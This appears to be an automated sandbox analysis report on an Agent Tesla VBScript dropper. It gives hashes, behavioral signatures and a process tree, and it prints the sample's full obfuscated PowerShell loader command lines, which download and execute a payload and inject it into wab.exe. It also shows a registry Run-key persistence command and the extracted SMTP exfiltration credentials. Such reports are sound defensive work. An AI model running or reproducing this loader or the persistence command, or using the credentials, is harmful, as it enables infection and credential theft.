Analysis
max time kernel: 148s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-06-2024 14:56
Static task: static1
Behavioral task: behavioral1
  Sample: 09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs
  Resource: win7-20240611-en
Behavioral task: behavioral2
  Sample: 09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs
  Resource: win10v2004-20240226-en
General
Target: 09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs
Size: 91KB
MD5: 44d9ad2f0db6d4cb899d6657974c817b
SHA1: 1a76e0f99bffc9a92c8578f87538f2efb2b94ec9
SHA256: 09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19
SHA512: 09b6a077beed527f4756d9d20f696a66976537e1fcef947fa29ac8e8f9c761be83297a07920e050f4df1ca16d41b11b51298d9d72f45ad352e5166fd95a68c8b
SSDEEP: 1536:w01/LsA0DnkdzhX7RXaSMmr2rFHxsASgxWxCwhrdM5XRyz29KWFj:w09LB0DnWzhX7RXaSMxhxsAhWEwhrdMZ
Malware Config
Extracted: agenttesla
Protocol: smtp
Host: mail.myhydropowered.com
Port: 587
Username: [email protected]
Password: n8h0yvDxAKrtxKB
Email To: [email protected]
Signatures
AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.
Blocklisted process makes network request (2 IoCs)
Processes: powershell.exe
  flow 9, PID 1284, powershell.exe
  flow 11, PID 1284, powershell.exe
Adds Run key to start application (2 TTPs, 2 IoCs)
Processes: reg.exe, wab.exe
  Set value (str): \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Delngler = "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\\litteratursociologi\\').Hirstie;%Grusvejene% ($erasement)" (reg.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DtcHF = "C:\\Users\\Admin\\AppData\\Roaming\\DtcHF\\DtcHF.exe" (wab.exe)
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
Looks up external IP address via web service (3 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 72, ip-api.com
  flow 70, api.ipify.org
  flow 71, api.ipify.org
Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
Processes: wab.exe
  PID 3412, wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes: powershell.exe, wab.exe
  PID 4232, powershell.exe
  PID 3412, wab.exe
Suspicious use of SetThreadContext (1 IoCs)
Processes: powershell.exe
  PID 4232 set thread context of 3412 (powershell.exe, procid_target 105)
Modifies registry key (1 TTPs, 1 IoCs)
Suspicious behavior: EnumeratesProcesses (9 IoCs)
Processes: powershell.exe, powershell.exe, wab.exe
  PID 1284, powershell.exe (2 entries)
  PID 4232, powershell.exe (4 entries)
  PID 3412, wab.exe (3 entries)
Suspicious behavior: MapViewOfSection (1 IoCs)
Processes: powershell.exe
  PID 4232, powershell.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes: powershell.exe, powershell.exe, wab.exe
  Token: SeDebugPrivilege, PID 1284, powershell.exe
  Token: SeDebugPrivilege, PID 4232, powershell.exe
  Token: SeDebugPrivilege, PID 3412, wab.exe
Suspicious use of WriteProcessMemory (21 IoCs)
Processes: WScript.exe, powershell.exe, powershell.exe, wab.exe, cmd.exe
  PID 3452 (WScript.exe) wrote to memory of 1284, procid_target 91 (2 entries)
  PID 1284 (powershell.exe) wrote to memory of 3420, procid_target 93 (2 entries)
  PID 1284 (powershell.exe) wrote to memory of 4232, procid_target 98 (3 entries)
  PID 4232 (powershell.exe) wrote to memory of 632, procid_target 102 (3 entries)
  PID 4232 (powershell.exe) wrote to memory of 3412, procid_target 105 (5 entries)
  PID 3412 (wab.exe) wrote to memory of 3312, procid_target 107 (3 entries)
  PID 3312 (cmd.exe) wrote to memory of 1704, procid_target 109 (3 entries)
Processes
Level 1: C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs"
  - Suspicious use of WriteProcessMemory
  PID: 3452
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle 1 "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? 
Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] 
Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. 
Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ .estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 
'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. 
Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 1284
Level 3: C:\Windows\system32\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"
  PID: 3420
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? 
Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] 
Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. 
Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ .estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 
'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. 
Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"3⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 4232
Level 4: C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"
  PID: 632
Level 4: C:\Program Files (x86)\windows mail\wab.exe
  Command line: "C:\Program Files (x86)\windows mail\wab.exe"
  - Adds Run key to start application
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 3412
Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"
  - Suspicious use of WriteProcessMemory
  PID: 3312
Level 6: C:\Windows\SysWOW64\reg.exe
  Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"
  - Adds Run key to start application
  - Modifies registry key
  PID: 1704
Level 1: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
